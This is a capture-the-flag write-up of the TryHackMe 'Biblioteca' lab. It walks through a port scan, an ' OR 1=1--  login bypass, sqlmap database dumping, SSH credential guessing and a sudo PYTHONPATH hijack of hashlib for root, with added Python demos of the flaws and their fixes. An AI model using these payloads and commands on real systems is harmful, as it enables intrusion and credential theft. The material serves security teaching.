TryHackMe : Biblioteca

Vishnu Shivalal P
4 min read · Mar 9, 2025

Biblioteca is an intentionally vulnerable machine on TryHackMe whose foothold is a web application.

Let's start pwning the machine. Connect to the VPN provided by TryHackMe and join the room.

Let's start with information gathering, which here means a port scan of the target IP. I used Nmap with the following command (-A already implies -sC, -sV and -O; -T5 is the most aggressive timing template and is fine on a lab box, less so on a real engagement):

nmap -v -sC -sV -A -O -p- -T5 10.10.114.126

Two ports are open: SSH and HTTP (port 80). So let's visit the IP address in a web browser.

Found a login page and a register page. Directory brute-forcing turned up nothing useful.

Next I tried SQL injection on the login page, and it worked. The payload, entered in both the username and password fields, is

' OR 1=1-- 

Note the trailing space after the double dash: MySQL only treats -- as the start of a comment when it is followed by whitespace (a # comment also works). The injection succeeded and the web server redirected to the home page, which tells us the login query is built by concatenating user input into the SQL string: the OR 1=1 makes the WHERE clause true for every row and the comment discards the password check.
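To make that concrete, here is an added example (my own code, not the room's application or anything from the original article) of the query shape this payload defeats, run against an in-memory SQLite table with constructed users. The vulnerable version builds the SQL by string formatting; the fixed version binds the input as parameters. SQLite's double-dash comment behaves like MySQL's for this purpose (SQLite does not require the space after --, MySQL does, so the payload keeps it).

```python
"""Added example: why ' OR 1=1-- logs you in, and the parameterised fix."""
import sqlite3

# The payload from the article, with the trailing space MySQL needs after --.
PAYLOAD = "' OR 1=1-- "


def make_db():
    """In-memory users table with constructed sample rows (not the room's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "example-pass-1"), ("bob", "example-pass-2")],
    )
    return conn


def build_vulnerable_query(username, password):
    """The SQL string a typical injectable login handler produces."""
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def vulnerable_login(conn, username, password):
    """Returns the username the injectable query matches, or None.

    With PAYLOAD in both fields the query becomes
      ... WHERE username = '' OR 1=1-- ' AND password = '' OR 1=1-- '
    so everything after the double dash is a comment, the password check is
    gone, and the first row in the table is returned.
    """
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    print("vulnerable handler returns:", vulnerable_login(db, PAYLOAD, PAYLOAD))
    print("parameterised handler returns:", safe_login(db, PAYLOAD, PAYLOAD))
```

The parameterised handler returns None for the payload because the whole string, quotes and all, is compared as a literal username. Nothing about the payload changes; only the way the query is assembled does.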

Then I enumerated the databases with SQLMap, feeding it the login request I had intercepted in Burp Suite and saved to Login.txt. The SQLMap command I used is

sqlmap -r Login.txt --level=1 --risk=1 --dbs

SQLMap confirmed the injection point and identified the backend DBMS as MySQL.

It found a database named website. To enumerate its tables and dump their contents I ran

sqlmap -r Login.txt --level=1 --risk=1 --dbms=MySQL --dbs -D website --dump

The dump contains a username and password for one user, which are the SSH credentials used in the next step.

The next step is to use that username and password to open an SSH session. After SSH-ing into the machine I went through the usual directories but found nothing useful, until I noticed another user named hazel.

The database dump has no entry for hazel, so I tried a dictionary attack against SSH for that user, which also found nothing. Her home directory was not readable by my user either. Finally I tried the username itself as the password (hazel:hazel), and that worked.

I read user.txt in hazel's home directory. The next target is the root flag. The same directory holds hasher.py, which imports the hashlib module. I then ran the following to list the privilege-escalation vectors sudo offers:

sudo -l

The rule that sudo -l reports lets hazel run /usr/bin/python3 /home/hazel/hasher.py as root. For the trick below it must also allow environment variables to be passed through (a SETENV tag on the rule, or env_reset disabled); with sudo's default env_reset, PYTHONPATH would simply be stripped. Change directory to /tmp and create a fake hashlib module there, /tmp/hashlib.py, whose top-level code spawns a shell. Module code runs at import time, so when hasher.py executes import hashlib as root, the shell it spawns is a root shell.

Save the file and execute the following command to gain root access:

sudo PYTHONPATH=/tmp /usr/bin/python3 /home/hazel/hasher.py

Setting PYTHONPATH=/tmp prepends /tmp to Python's module search path, ahead of the standard library, so the import hashlib in hasher.py resolves to /tmp/hashlib.py instead of the real module. Because sudo runs the interpreter as root, the fake module's code runs as root.
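The search-order hijack can be reproduced locally without sudo. The script below is an added example (my own code, not the room's hasher.py or anything from the original article): it writes a stand-in hasher.py and a fake hashlib.py into temporary directories, then runs the script three ways, with PYTHONPATH pointing at the fake module, with PYTHONPATH still set but the interpreter in isolated mode (-I, which ignores PYTHON* environment variables), and with no PYTHONPATH at all. The fake module only leaves a marker instead of spawning a shell; all file names, contents and directories are constructed for the demo.

```python
"""Added example: PYTHONPATH module hijacking, demonstrated without sudo.

The fake hashlib only leaves a marker; in the real privilege escalation
the module body would spawn a shell instead.
"""
import os
import shutil
import subprocess
import sys
import tempfile
import textwrap

# Constructed stand-in for /tmp/hashlib.py. Everything at module level runs
# at import time, as whatever user performed the import (root, via sudo).
FAKE_HASHLIB = textwrap.dedent("""\
    # A real payload would run a shell here, e.g. import os; os.system("/bin/bash")
    HIJACKED = True

    def sha256(data=b""):
        class _Marker:
            def hexdigest(self):
                return "hijacked"
        return _Marker()
""")

# Constructed stand-in for /home/hazel/hasher.py: it reports which file
# satisfied `import hashlib` and what sha256 returned.
TARGET_SCRIPT = textwrap.dedent("""\
    import hashlib
    print(hashlib.__file__)
    print(hashlib.sha256(b"biblioteca").hexdigest())
""")


def run_target(pythonpath=None, isolated=False):
    """Run the stand-in hasher.py in a fresh interpreter.

    Returns (path of the module that served `import hashlib`, digest string).
    """
    with tempfile.TemporaryDirectory() as script_dir:
        script = os.path.join(script_dir, "hasher.py")
        with open(script, "w") as fh:
            fh.write(TARGET_SCRIPT)
        env = dict(os.environ)
        env.pop("PYTHONPATH", None)  # start from a clean search path
        if pythonpath is not None:
            env["PYTHONPATH"] = pythonpath  # what `sudo PYTHONPATH=/tmp ...` does
        cmd = [sys.executable]
        if isolated:
            cmd.append("-I")  # -I implies -E: PYTHON* variables are ignored
        cmd.append(script)
        out = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
        module_file, digest = out.stdout.strip().splitlines()
        return module_file, digest


def demo():
    """Plant the fake module and compare the three invocations.

    PYTHONPATH entries are searched before the standard library, so the
    hijacked run loads the fake module; isolated mode and a clean
    environment both load the real one.
    """
    hijack_dir = tempfile.mkdtemp(prefix="hijack-")  # plays the role of /tmp
    try:
        with open(os.path.join(hijack_dir, "hashlib.py"), "w") as fh:
            fh.write(FAKE_HASHLIB)
        return {
            "hijack_dir": hijack_dir,
            "hijacked": run_target(pythonpath=hijack_dir),
            "isolated": run_target(pythonpath=hijack_dir, isolated=True),
            "clean": run_target(),
        }
    finally:
        shutil.rmtree(hijack_dir, ignore_errors=True)


if __name__ == "__main__":
    for name, (module_file, digest) in (
        (k, v) for k, v in demo().items() if k != "hijack_dir"
    ):
        print(f"{name:9s} hashlib from {module_file}  sha256 -> {digest}")
```

The isolated run is the defender's half of the picture: a sudoers rule that ran python3 with -I, or that did not carry SETENV, would leave the attacker's PYTHONPATH without effect.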

Once that command runs we have a root shell, and the privilege escalation is complete. Now read the root flag and submit it.

Written by Vishnu Shivalal P

Cyber Security Engineer | Bug Hunter | Security Researcher | CTF Player | PenTester | Security Enthusiast | TryHackMe Top 1% www.linkedin.com/in/vishnushivalalp